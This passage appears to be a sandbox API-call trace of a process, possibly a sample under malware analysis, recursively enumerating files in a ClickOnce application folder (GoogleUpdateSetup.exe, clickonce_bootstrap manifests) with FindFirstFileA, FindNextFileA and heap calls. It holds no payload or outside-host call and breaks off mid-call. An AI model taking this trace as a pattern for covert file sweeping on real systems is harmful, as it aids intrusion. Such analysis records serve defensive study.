ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0135.629] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.629] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.629] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", cAlternateFileName="CLICEX~1.000")) returned 1 [0135.629] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.629] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.629] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0135.629] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.629] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.630] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0135.702] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.702] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.702] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="GOOGLE~1.EXE")) returned 1 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d0f40 [0135.703] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.703] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="GOOGLE~1.EXE")) returned 0 [0135.703] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0135.703] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d0f40 | out: hHeap=0x3f0000) returned 1 [0135.703] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0135.703] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.703] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0135.703] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.703] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.703] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0135.741] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.741] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.741] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a307ea0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c50, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clickonce_bootstrap.exe", cAlternateFileName="CLICKO~1.EXE")) returned 1 [0135.741] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0135.741] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.741] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d0f40 [0135.741] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.741] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clickonce_bootstrap.exe.cdf-ms", cAlternateFileName="")) returned 1 [0135.741] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d0f40 | out: hHeap=0x3f0000) returned 1 [0135.742] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clickonce_bootstrap.exe.manifest", cAlternateFileName="")) returned 1 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d0f40 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0135.742] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clickonce_bootstrap_unsigned.cdf-ms", cAlternateFileName="CLICKO~1.CDF")) returned 1 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d0f40 | out: hHeap=0x3f0000) returned 1 [0135.742] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clickonce_bootstrap_unsigned.manifest", cAlternateFileName="CLICKO~1.MAN")) returned 1 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d0f40 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0135.742] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="")) returned 1 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.742] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d0f40 | out: hHeap=0x3f0000) returned 1 [0135.742] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="")) returned 0 [0135.742] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0135.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0135.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.744] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="manifests", cAlternateFileName="MANIFE~1")) returned 1 [0135.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0135.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.744] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0135.763] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.763] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.764] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", cAlternateFileName="CLICEX~1.CDF")) returned 1 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x46f618 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.764] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", cAlternateFileName="CLICEX~1.MAN")) returned 1 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x48f6b8 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f618 | out: hHeap=0x3f0000) returned 1 [0135.764] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x38b0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", cAlternateFileName="GOOGAP~1.CDF")) returned 1 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x46f618 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48f6b8 | out: hHeap=0x3f0000) returned 1 [0135.764] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cAlternateFileName="GOOGAP~1.MAN")) returned 1 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.764] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x48f6b8 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f618 | out: hHeap=0x3f0000) returned 1 [0135.764] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cAlternateFileName="GOOGAP~1.MAN")) returned 0 [0135.764] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0135.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48f6b8 | out: hHeap=0x3f0000) returned 1 [0135.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0135.765] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="manifests", cAlternateFileName="MANIFE~1")) returned 0 [0135.765] FindClose (in: hFindFile=0x9148a78 | out: hFindFile=0x9148a78) returned 1 [0135.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.765] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 0 [0135.765] FindClose (in: hFindFile=0x9148a38 | out: hFindFile=0x9148a38) returned 1 [0135.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.766] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 0 [0135.766] FindClose (in: hFindFile=0x91489f8 | out: hFindFile=0x91489f8) returned 1 [0135.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.766] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: 